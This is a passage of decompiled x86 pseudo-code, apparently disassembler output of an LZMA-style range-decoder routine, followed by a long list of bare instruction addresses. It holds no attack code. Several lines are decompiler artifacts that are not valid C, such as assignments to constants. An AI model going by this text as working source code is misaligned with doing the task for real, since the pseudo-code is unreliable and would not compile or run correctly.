								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                          0x00000000
                                                          0x00406ca2
                                                          0x00406ca2
                                                          0x00406ca6
                                                          0x00406d5d
                                                          0x00406d60
                                                          0x00406d6c
                                                          0x00406c4d
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fcb
                                                          0x00406fd1
                                                          0x00406fd7
                                                          0x00406ff1
                                                          0x00406ff4
                                                          0x00406ffa
                                                          0x00407005
                                                          0x00407007
                                                          0x00406fd9
                                                          0x00406fd9
                                                          0x00406fe8
                                                          0x00406fec
                                                          0x00406fec
                                                          0x00407011
                                                          0x00407038
                                                          0x00407038
                                                          0x0040703e
                                                          0x0040703e
                                                          0x00000000
                                                          0x00407013
                                                          0x00407013
                                                          0x00407017
                                                          0x004071c6
                                                          0x00000000
                                                          0x004071c6
                                                          0x00407023
                                                          0x0040702a
                                                          0x00407032
                                                          0x00407035
                                                          0x00000000
                                                          0x00407035
                                                          0x00406cac
                                                          0x00406cb0
                                                          0x004071f1
                                                          0x004071f1
                                                          0x004071f4
                                                          0x004071f8
                                                          0x004071f8
                                                          0x00406cb6
                                                          0x00406cbc
                                                          0x00406cbf
                                                          0x00406cc3
                                                          0x00406cc6
                                                          0x00406cca
                                                          0x00407190
                                                          0x004071dc
                                                          0x004071e4
                                                          0x004071eb
                                                          0x004071ed
                                                          0x00000000
                                                          0x004071ed
                                                          0x00406cd0
                                                          0x00406cd3
                                                          0x00406cd9
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cde
                                                          0x00406ce1
                                                          0x00406ce4
                                                          0x00406ce7
                                                          0x00406cea
                                                          0x00406ced
                                                          0x00406cee
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf3
                                                          0x00406cf6
                                                          0x00406cf9
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cff
                                                          0x00406d01
                                                          0x00406d01
                                                          0x00406d04
                                                          0x00406d04
                                                          0x00406d04
                                                          0x004067da
                                                          0x004067da
                                                          0x004067e3
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x00000000
                                                          0x004067f4
                                                          0x00000000
                                                          0x00000000
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406807
                                                          0x00000000
                                                          0x00000000
                                                          0x0040680d
                                                          0x00406810
                                                          0x00406812
                                                          0x00406813
                                                          0x00406816
                                                          0x00406818
                                                          0x00406819
                                                          0x0040681b
                                                          0x0040681e
                                                          0x00406823
                                                          0x00406828
                                                          0x00406831
                                                          0x00406844
                                                          0x00406847
                                                          0x00406853
                                                          0x0040687b
                                                          0x0040687d
                                                          0x0040688b
                                                          0x0040688b
                                                          0x0040688f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040687f
                                                          0x0040687f
                                                          0x00406882
                                                          0x00406883
                                                          0x00406883
                                                          0x00000000
                                                          0x0040687f
                                                          0x00406859
                                                          0x0040685e
                                                          0x0040685e
                                                          0x00406867
                                                          0x0040686f
                                                          0x00406872
                                                          0x00000000
                                                          0x00406878
                                                          0x00406878
                                                          0x00000000
                                                          0x00406878
                                                          0x00000000
                                                          0x00406895
                                                          0x00406895
                                                          0x00406899
                                                          0x00407145
                                                          0x00000000
                                                          0x00407145
                                                          0x004068a2
                                                          0x004068b2
                                                          0x004068b5
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068bb
                                                          0x004068bf
                                                          0x00000000
                                                          0x00000000
                                                          0x004068c1
                                                          0x004068c7
                                                          0x004068f1
                                                          0x004068f7
                                                          0x004068fe
                                                          0x00000000
                                                          0x004068fe
                                                          0x004068cd
                                                          0x004068d0
                                                          0x004068d5
                                                          0x004068d5
                                                          0x004068e0
                                                          0x004068e8
                                                          0x004068eb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406930
                                                          0x00406936
                                                          0x00406939
                                                          0x00406946
                                                          0x0040694e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406905
                                                          0x00406905
                                                          0x00406909
                                                          0x00407154
                                                          0x00000000
                                                          0x00407154
                                                          0x00406915
                                                          0x00406920
                                                          0x00406920
                                                          0x00406920
                                                          0x00406923
                                                          0x00406926
                                                          0x00406929
                                                          0x0040692e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406956
                                                          0x00406958
                                                          0x0040695b
                                                          0x004069cc
                                                          0x004069cf
                                                          0x004069d2
                                                          0x004069d9
                                                          0x004069e3
                                                          0x00000000
                                                          0x004069e3
                                                          0x0040695d
                                                          0x00406961
                                                          0x00406964
                                                          0x00406966
                                                          0x00406969
                                                          0x0040696c
                                                          0x0040696e
                                                          0x00406971
                                                          0x00406973
                                                          0x00406978
                                                          0x0040697b
                                                          0x0040697e
                                                          0x00406982
                                                          0x00406989
                                                          0x0040698c
                                                          0x00406993
                                                          0x00406997
                                                          0x0040699f
                                                          0x0040699f
                                                          0x0040699f
                                                          0x00406999
                                                          0x00406999
                                                          0x00406999
                                                          0x0040698e
                                                          0x0040698e
                                                          0x0040698e
                                                          0x004069a3
                                                          0x004069a6
                                                          0x004069c4
                                                          0x004069c6
                                                          0x00000000
                                                          0x004069a8
                                                          0x004069a8
                                                          0x004069ab
                                                          0x004069ae
                                                          0x004069b1
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b6
                                                          0x004069b9
                                                          0x004069bb
                                                          0x004069bc
                                                          0x004069bf
                                                          0x00000000
                                                          0x004069bf
                                                          0x00000000
                                                          0x00406bf5
                                                          0x00406bf9
                                                          0x00406c17
                                                          0x00406c1a
                                                          0x00406c21
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2a
                                                          0x00406c2d
                                                          0x00406c30
                                                          0x00406c32
                                                          0x00406c39
                                                          0x00406c3a
                                                          0x00406c3c
                                                          0x00406c3f
                                                          0x00406c42
                                                          0x00406c45
                                                          0x00406c45
                                                          0x00406c4a
                                                          0x00000000
                                                          0x00406c4a
                                                          0x00406bfb
                                                          0x00406bfe
                                                          0x00406c01
                                                          0x00406c0b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c5f
                                                          0x00406c63
                                                          0x00406c86
                                                          0x00406c89
                                                          0x00406c8c
                                                          0x00406c96
                                                          0x00406c65
                                                          0x00406c65
                                                          0x00406c68
                                                          0x00406c6b
                                                          0x00406c6e
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00406c7e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d13
                                                          0x00406d17
                                                          0x00406d1e
                                                          0x00406d21
                                                          0x00406d24
                                                          0x00406d2e
                                                          0x00000000
                                                          0x00406d2e
                                                          0x00406d19
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d3a
                                                          0x00406d3e
                                                          0x00406d45
                                                          0x00406d48
                                                          0x00406d4b
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00406d54
                                                          0x00406d54
                                                          0x00406d57
                                                          0x00406d5a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dfa
                                                          0x00406dfa
                                                          0x00406dfe
                                                          0x0040719c
                                                          0x00000000
                                                          0x0040719c
                                                          0x00406e04
                                                          0x00406e07
                                                          0x00406e0a
                                                          0x00406e0e
                                                          0x00406e11
                                                          0x00406e17
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e1c
                                                          0x00406e1f
                                                          0x00000000
                                                          0x00000000
                                                          0x004069ef
                                                          0x004069ef
                                                          0x004069f3
                                                          0x00407160
                                                          0x00000000
                                                          0x00407160
                                                          0x004069f9
                                                          0x004069fc
                                                          0x004069ff
                                                          0x00406a03
                                                          0x00406a06
                                                          0x00406a0c
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a11
                                                          0x00406a14
                                                          0x00406a14
                                                          0x00406a17
                                                          0x00406a1a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a20
                                                          0x00406a26
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a2c
                                                          0x00406a2c
                                                          0x00406a30
                                                          0x00406a33
                                                          0x00406a36
                                                          0x00406a39
                                                          0x00406a3c
                                                          0x00406a3d
                                                          0x00406a40
                                                          0x00406a42
                                                          0x00406a48
                                                          0x00406a4b
                                                          0x00406a4e
                                                          0x00406a51
                                                          0x00406a54
                                                          0x00406a57
                                                          0x00406a5a
                                                          0x00406a76
                                                          0x00406a79
                                                          0x00406a7c
                                                          0x00406a7f
                                                          0x00406a86
                                                          0x00406a8a
                                                          0x00406a8c
                                                          0x00406a90
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a60
                                                          0x00406a68
                                                          0x00406a6d
                                                          0x00406a6f
                                                          0x00406a71
                                                          0x00406a71
                                                          0x00406a93
                                                          0x00406a9a
                                                          0x00406a9d
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa8
                                                          0x00406aa8
                                                          0x00406aac
                                                          0x0040716c
                                                          0x00000000
                                                          0x0040716c
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab8
                                                          0x00406abc
                                                          0x00406abf
                                                          0x00406ac5
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406aca
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406ad3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ad5
                                                          0x00406ad8
                                                          0x00406adb
                                                          0x00406ade
                                                          0x00406ae1
                                                          0x00406ae4
                                                          0x00406ae7
                                                          0x00406aea
                                                          0x00406aed
                                                          0x00406af0
                                                          0x00406af3
                                                          0x00406b0b
                                                          0x00406b0e
                                                          0x00406b11
                                                          0x00406b14
                                                          0x00406b14
                                                          0x00406b17
                                                          0x00406b1b
                                                          0x00406b1d
                                                          0x00406af5
                                                          0x00406af5
                                                          0x00406afd
                                                          0x00406b02
                                                          0x00406b04
                                                          0x00406b06
                                                          0x00406b06
                                                          0x00406b20
                                                          0x00406b27
                                                          0x00406b2a
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00406b2a
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b6c
                                                          0x00406b6c
                                                          0x00406b70
                                                          0x00407178
                                                          0x00000000
                                                          0x00407178
                                                          0x00406b76
                                                          0x00406b79
                                                          0x00406b7c
                                                          0x00406b80
                                                          0x00406b83
                                                          0x00406b89
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8e
                                                          0x00406b91
                                                          0x00406b91
                                                          0x00406b97
                                                          0x00406b35
                                                          0x00406b35
                                                          0x00406b38
                                                          0x00000000
                                                          0x00406b38
                                                          0x00406b99
                                                          0x00406b99
                                                          0x00406b9c
                                                          0x00406b9f
                                                          0x00406ba2
                                                          0x00406ba5
                                                          0x00406ba8
                                                          0x00406bab
                                                          0x00406bae
                                                          0x00406bb1
                                                          0x00406bb4
                                                          0x00406bb7
                                                          0x00406bcf
                                                          0x00406bd2
                                                          0x00406bd5
                                                          0x00406bd8
                                                          0x00406bd8
                                                          0x00406bdb
                                                          0x00406bdf
                                                          0x00406be1
                                                          0x00406bb9
                                                          0x00406bb9
                                                          0x00406bc1
                                                          0x00406bc6
                                                          0x00406bc8
                                                          0x00406bca
                                                          0x00406bca
                                                          0x00406be4
                                                          0x00406beb
                                                          0x00406bee
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406e7d
                                                          0x00406e7d
                                                          0x00406e81
                                                          0x004071a8
                                                          0x00000000
                                                          0x004071a8
                                                          0x00406e87
                                                          0x00406e8a
                                                          0x00406e8d
                                                          0x00406e91
                                                          0x00406e94
                                                          0x00406e9a
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f8c
                                                          0x00406f90
                                                          0x00406fb2
                                                          0x00406fb5
                                                          0x00406fbf
                                                          0x00000000
                                                          0x00406fbf
                                                          0x00406f92
                                                          0x00406f95
                                                          0x00406f99
                                                          0x00406f9c
                                                          0x00406f9c
                                                          0x00406f9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00407049
                                                          0x0040704d
                                                          0x0040706b
                                                          0x0040706b
                                                          0x0040706b
                                                          0x00407072
                                                          0x00407079
                                                          0x00407080
                                                          0x00407080
                                                          0x00000000
                                                          0x00407080
                                                          0x0040704f
                                                          0x00407052
                                                          0x00407055
                                                          0x00407058
                                                          0x0040705f
                                                          0x00406fa3
                                                          0x00406fa3
                                                          0x00406fa6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040713a
                                                          0x0040713d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d74
                                                          0x00406d76
                                                          0x00406d7d
                                                          0x00406d7e
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d8b
                                                          0x00406d8e
                                                          0x00406d91
                                                          0x00406d93
                                                          0x00406d95
                                                          0x00406d95
                                                          0x00406d96
                                                          0x00406d99
                                                          0x00406da0
                                                          0x00406da3
                                                          0x00406db1
                                                          0x00000000
                                                          0x00000000
                                                          0x00407087
                                                          0x00407087
